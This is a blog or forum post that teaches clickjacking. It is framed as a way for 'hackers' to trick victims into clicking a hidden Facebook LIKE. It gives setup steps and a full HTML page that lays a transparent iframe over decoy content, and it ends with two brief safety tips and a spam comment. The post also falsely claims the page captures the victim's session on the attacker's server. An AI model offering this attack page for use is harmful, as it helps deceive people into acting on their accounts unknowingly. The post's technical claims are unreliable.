Why do hackers whant to use Click Jacking?
Say we are hackers and we want to promote our blog by pressing LIKE under our topic. Let's say the topic is very interesting, yet not enough users clicked our LIKE button. So what we will do is build a page with a nice young lady in a tiny bathing suit and a LIKE button beneath it that does nothing...
Underneath the button we will implant a transparent iframe with a button that simulate a remote LIKE on our blog.
Than all we need to do is insert the link into Facebook or other social net and wait patiently.
So how to start Click Jacking..
First of all you need to setup a local HTTP server: Apache, Windows 2003/2008 and more.
Go to - http://lifehacker.com/124212/geek-to-li ... web-server
Second, you need to take a little tutorial on how to build an <iframe> inside an HTML page.
Download notepad++ from here: http://notepad-plus-plus.org
This program is a free source code editor which supports several programming languages running under the MS Windows environment. Means you can write HTML pages and than save them on your HTTP server as .html files
and they will run like a regular website..
Example:
We've setup an HTTP server on our localhost PC (AKA my computer), now the server is located in one of our drives, say - C:\PCusername\ (depends on your set-up of ROOT for your server)
Now all you need to do is open the Notepad++ and "develop" a client side HTML <iframe> and save it as .html extension
ON YOUR ROOT DIRECTORY!
Than when you open your server with your browser the address will be http://localhost/myJack.html
Next we need the page to display some data to the victim and on the same place in the page
we will implant a transparent frame of our choice, and while pressing the data the victim sees, the page will operate
the iframe behind it at the same time, making the Jacking without the victim's notice.
<ifame> example and how to build an HTML page
<html> // HTML tag to start building the page
<head> // Page header(to soon for you, just copy it)
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Clickjacking example</title> // Title for the Browser's label
</head> // End of Header
<body> // Body tag says that the page data (body) will start from here
<div style="z-index:2; position:absolute;top:0; left:0;width: 70%; height:70%"> - // Div tag is usually for placing the object in the page at a certain order
<!-- %% HERE IS THE IFRAME %% -->
<iframe runat="server" src="http://www.facebook.com/home.php?" id="frame1" style="opacity:0.4;filter:alpha(opacity=40); " width="100%" height="100%" onmouseover="this.style.opacity=.5;this.filters.alpha.opacity=50" onmouseout="this.style.opacity=0;this.filters.alpha.opacity=0"/>
</iframe>
</div>
<div align="right" style="position:absolute; top:0; left:0; z-index:1; width: 70%;height:70%; background-color: yellow;text-align:left;">
<font size="3"><p>
<strong>This is an example of how a simple clickjacking attack is done by a malicious site. </strong><br /> //Text inside the iframe
Text Text Text Text Text Text Text Text</p> <p><strong>
</body>
</html>
Now look carefully inside the code and follow my lead: COPY means writing the same NOT copy-paste!!
Start with HTML page tag (<html>), after it comes the page header (<head>), copy it. Open a BODY tag (<body>) and copy the Div tag with it's statments.
Now copy the Iframe step by step and you'll see that the Notepad++ is painting the tags if you do it right.
Iframe contains 'src' which stands for Source - that's where the victim will be redirected, a 'style' for
colours and pixels, 'runat' - means run at and the only option is 'server' value, and method to operate while using this object (onmouseover).
After that close the Div tag and open a new one for the Text. Insert Text and close the page like this:
</body></html>
*Our victim is allready logged into Facebook, so the redirection to the login page will input automatically the victim's
session in order to bypass the login authentication, and at the same time save the session on the attacker's server.
onmouseover - http://www.w3schools.com/jsref/event_onmouseover.asp
*read about 'onmouseout' also
Session - is the period of activity between a user logging in and logging out of a (multi-user) system.
That's it! your Page is ready! save it on your HTTP server's ROOT directory and open it with your browser.
you'll see that there is a yellow section inside your page with your "Text Text Text Text..."
And if you move your mouse over it, the iframe will appear while changing the page's opacity..
In real Jacking there wont be any Opacity and the victim won't see the Facebook's frame.
Contact me on private to see a final pictures.
Avoiding becoming a victim of such attacks:
1) Log off your accounts before you go surfing/clicking around on random sites you don't know/trust.
2) Avoid random links sent to you (in a message, email, etc).
Cheers,
Ce@ser
To see Cheap WOW Gold and Buy Runescape Goldworld in a granda of stand.And a heaven in a wild flower.Hold infinity in the palm your hand and eternity in an hour.
ReplyDelete